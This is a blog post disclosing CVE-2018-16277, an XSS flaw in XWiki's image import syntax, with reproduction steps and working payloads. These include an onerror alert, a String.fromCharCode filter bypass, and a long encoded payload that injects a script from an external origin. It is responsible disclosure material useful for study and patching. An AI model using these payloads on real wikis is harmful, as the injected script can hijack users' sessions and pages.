CVE-2018-16277 – XSS in XWiki

At the beginning of the September I have found XSS vulnerability in XWiki Image Import function. There is a short explanation of this vulnerability below.

Description:
There’s an XSS on in image import function ( image: ). It’s available only for logged in users, who are allowed to create new posts. XWiki up to 10.7 (the most recent version so far) is vulnerable to this attack.

Steps to reproduce bug:

  1. Go to page edition (for example: https://playground.xwiki.org/xwiki/bin/edit/Sandbox/WebHome
  2. Select „Source” button
  3. In source enter your payload:
[[image:testpayload||alt="" width="1" height="1" onerror="alert(document.location)"]]

4. Click „Preview” (it’s better to click Preview than Save & View, because Save & View will overwrite XWiki Page and you won’t be able to revert changes, if you use document.write() in your payload)
5. There’s XSS!

2

This XSS is quite limited, because you can’t use characters like:

"  '  / :  ;

in your payload – but there’s always a way around such limitations. In this case, you can use combination of JS functions: document.write() and String.fromCharCode().

Take a look at this piece of code:

[[image:testpayload||alt="" width="1" height="1" onerror="document.write(String.fromCharCode(65,32,66,32,67,32))"]]

(this payload will overwrite whole XWiki Page with „A  B C „)

Thanks to String.fromCharCode(), you can craft any payload you want.

You can also include scripts from other origins!

Here’s a payload, that will open a calculator app using script from other origin:

[[image:testpayload||alt="" width="1" height="1" onerror="document.write(String.fromCharCode(60, 112, 32, 100, 97, 116, 97, 45, 104, 101, 105, 103, 104, 116, 61, 34, 50, 54, 53, 34, 32, 100, 97, 116, 97, 45, 116, 104, 101, 109, 101, 45, 105, 100, 61, 34, 100, 97, 114, 107, 34, 32, 100, 97, 116, 97, 45, 115, 108, 117, 103, 45, 104, 97, 115, 104, 61, 34, 118, 105, 111, 116, 74, 34, 32, 100, 97, 116, 97, 45, 100, 101, 102, 97, 117, 108, 116, 45, 116, 97, 98, 61, 34, 104, 116, 109, 108, 44, 114, 101, 115, 117, 108, 116, 34, 32, 100, 97, 116, 97, 45, 117, 115, 101, 114, 61, 34, 106, 111, 115, 104, 115, 109, 105, 116, 104, 48, 49, 34, 32, 100, 97, 116, 97, 45, 112, 101, 110, 45, 116, 105, 116, 108, 101, 61, 34, 65, 32, 74, 97, 118, 97, 83, 99, 114, 105, 112, 116, 32, 67, 97, 108, 99, 117, 108, 97, 116, 111, 114, 34, 32, 100, 97, 116, 97, 45, 112, 114, 101, 118, 105, 101, 119, 61, 34, 116, 114, 117, 101, 34, 32, 99, 108, 97, 115, 115, 61, 34, 99, 111, 100, 101, 112, 101, 110, 34, 62, 83, 101, 101, 32, 116, 104, 101, 32, 80, 101, 110, 32, 60, 97, 32, 104, 114, 101, 102, 61, 34, 104, 116, 116, 112, 115, 58, 47, 47, 99, 111, 100, 101, 112, 101, 110, 46, 105, 111, 47, 106, 111, 115, 104, 115, 109, 105, 116, 104, 48, 49, 47, 112, 101, 110, 47, 118, 105, 111, 116, 74, 47, 34, 62, 65, 32, 74, 97, 118, 97, 83, 99, 114, 105, 112, 116, 32, 67, 97, 108, 99, 117, 108, 97, 116, 111, 114, 60, 47, 97, 62, 32, 98, 121, 32, 74, 111, 115, 104, 32, 83, 109, 105, 116, 104, 32, 40, 60, 97, 32, 104, 114, 101, 102, 61, 34, 104, 116, 116, 112, 115, 58, 47, 47, 99, 111, 100, 101, 112, 101, 110, 46, 105, 111, 47, 106, 111, 115, 104, 115, 109, 105, 116, 104, 48, 49, 34, 62, 64, 106, 111, 115, 104, 115, 109, 105, 116, 104, 48, 49, 60, 47, 97, 62, 41, 32, 111, 110, 32, 60, 97, 32, 104, 114, 101, 102, 61, 34, 104, 116, 116, 112, 115, 58, 47, 47, 99, 111, 100, 101, 112, 101, 110, 46, 105, 111, 34, 62, 67, 111, 100, 101, 80, 101, 110, 60, 47, 97, 62, 46, 60, 47, 112, 62, 10, 60, 115, 99, 114, 105, 112, 116, 32, 97, 115, 121, 110, 99, 32, 115, 114, 99, 61, 34, 104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 105, 99, 46, 99, 111, 100, 101, 112, 101, 110, 46, 105, 111, 47, 97, 115, 115, 101, 116, 115, 47, 101, 109, 98, 101, 100, 47, 101, 105, 46, 106, 115, 34, 62, 60, 47, 115, 99, 114, 105, 112, 116, 62))"]]

calc

POC (Firefox Quantum 62.0) (if calculator doesn’t show, then refresh page)

Dodaj komentarz

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *